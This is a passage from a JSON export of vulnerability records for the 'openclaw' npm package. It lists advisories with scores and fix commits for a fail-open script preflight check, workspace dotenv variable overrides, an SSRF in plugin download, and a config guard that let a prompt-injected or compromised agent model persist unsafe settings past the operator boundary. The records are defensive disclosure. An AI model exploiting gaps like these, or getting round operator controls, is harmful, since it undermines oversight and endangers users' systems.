"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/5275d008ed33203dba3f98e969ad683a65c416c3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/5275d008ed33203dba3f98e969ad683a65c416c3" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2xcp-x87w-q377", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2xcp-x87w-q377" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45002", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45002" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-hook-session-key-bypass-via-template-mapping", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-hook-session-key-bypass-via-template-mapping" }, { "reference_url": "https://github.com/advisories/GHSA-2xcp-x87w-q377", "reference_id": "GHSA-2xcp-x87w-q377", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2xcp-x87w-q377" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "CVE-2026-45002", "GHSA-2xcp-x87w-q377" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y65g-4baa-a7c2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89035?format=api", "vulnerability_id": "VCID-y7sd-j9xn-qffs", "summary": "OpenClaw's complex interpreter pipelines could skip exec script preflight validation\n## Summary\n\nBefore OpenClaw 2026.4.2, exec script preflight validation could fail open on complex interpreter invocations such as pipes or other non-simple command forms. In those cases, script-content validation could be skipped entirely.\n\n## Impact\n\nAn attacker-controlled command shape could bypass the intended preflight validation for script execution. This weakened a defense-in-depth guard that was meant to block unsafe script content before execution.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513` — close the fail-open bypass in exec script preflight\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @iskindar for reporting, and thanks @wsparks-vc for coordination.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34425", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06326", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.0631", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06316", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34425" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34425", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34425" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass" }, { "reference_url": "https://github.com/advisories/GHSA-fvx6-pj3r-5q4q", "reference_id": "GHSA-fvx6-pj3r-5q4q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fvx6-pj3r-5q4q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-34425", "GHSA-fvx6-pj3r-5q4q" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y7sd-j9xn-qffs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95220?format=api", "vulnerability_id": "VCID-ye4t-n6r3-67ab", "summary": "OpenClaw's gateway config mutation guard allowed unsafe model-driven config writes\n## Summary\n\nThe agent-facing `gateway` tool protects `config.apply` and `config.patch` with a model-to-operator trust boundary. That guard used a hand-maintained denylist of protected config paths. The config schema outgrew that denylist, leaving sensitive subtrees writable through model-driven gateway config mutations.\n\n## Impact\n\nA prompt-injected or otherwise compromised model running with access to the owner-only `gateway` tool could persist unsafe config changes that crossed security boundaries. Examples included config paths affecting command execution, network/proxy/TLS behavior, credential forwarding, telemetry or hook endpoints, memory/indexing surfaces, and operator policy controls. These changes could survive restart once written to config.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nOpenClaw replaced the denylist with a fail-closed allowlist. Agent-driven `gateway config.apply` and `gateway config.patch` now permit only narrow agent-tunable prompt/model settings and mention-gating paths. Other config changes are rejected before the gateway mutation RPC is invoked.\n\n## Fix Commit(s)\n\n- `bceda6089aa7b3695cc7696b43c61ae3d01bb0ec` (`fix(gateway): fail closed on runtime config edits`)\n\n## Severity\n\nSeverity remains `high`. The vulnerable entry point is owner-only, but the model/agent is not a trusted principal under OpenClaw's security model, and the guard is the explicit model-to-operator boundary for persisted config mutation.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/bceda6089aa7b3695cc7696b43c61ae3d01bb0ec", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/bceda6089aa7b3695cc7696b43c61ae3d01bb0ec" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwj3-vqpp-pmxr", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwj3-vqpp-pmxr" }, { "reference_url": "https://github.com/advisories/GHSA-cwj3-vqpp-pmxr", "reference_id": "GHSA-cwj3-vqpp-pmxr", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cwj3-vqpp-pmxr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114733?format=api", "purl": "pkg:npm/openclaw@2026.4.23", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23" } ], "aliases": [ "GHSA-cwj3-vqpp-pmxr" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ye4t-n6r3-67ab" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89627?format=api", "vulnerability_id": "VCID-yhpq-5qy3-y7bn", "summary": "OpenClaw: Workspace dotenv could override runtime-control environment variables\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nWorkspace `.env` loading did not reserve the `OPENCLAW_` runtime-control namespace broadly enough. A malicious workspace could set variables such as `OPENCLAW_GIT_DIR` before source-update or installer flows, potentially steering trusted OpenClaw runtime behavior.\n\nThis requires running OpenClaw from an attacker-controlled workspace. Severity is medium.\n\n## Fix\n\nOpenClaw now reserves the workspace `OPENCLAW_` environment namespace and rejects workspace dotenv entries for OpenClaw runtime-control variables.\n\nFix commit:\n\n- `018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44114", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06532", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.0653", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.07178", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44114" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hxvm-xjvf-93f3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hxvm-xjvf-93f3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44114", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44114" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-namespace-collision-via-workspace-dotenv", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-namespace-collision-via-workspace-dotenv" }, { "reference_url": "https://github.com/advisories/GHSA-hxvm-xjvf-93f3", "reference_id": "GHSA-hxvm-xjvf-93f3", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hxvm-xjvf-93f3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "CVE-2026-44114", "GHSA-hxvm-xjvf-93f3" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yhpq-5qy3-y7bn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90336?format=api", "vulnerability_id": "VCID-ykwt-tdpa-3bft", "summary": "OpenClaw: SSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery\n## Summary\nSSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Keep the shipped marketplace archive-fetch SSRF, but narrow out the Ollama half because it is operator-configured and overlaps weaker trust-model or duplicate SSRF ground.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8deb9522f3d2680820588b190adb4a2a52f3670b` — 2026-03-30T20:08:38+01:00\n\nOpenClaw thanks @tdjackey for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41302", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13336", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13378", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13373", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41302" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/8deb9522f3d2680820588b190adb4a2a52f3670b", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/8deb9522f3d2680820588b190adb4a2a52f3670b" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9q7v-8mr7-g23p", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": 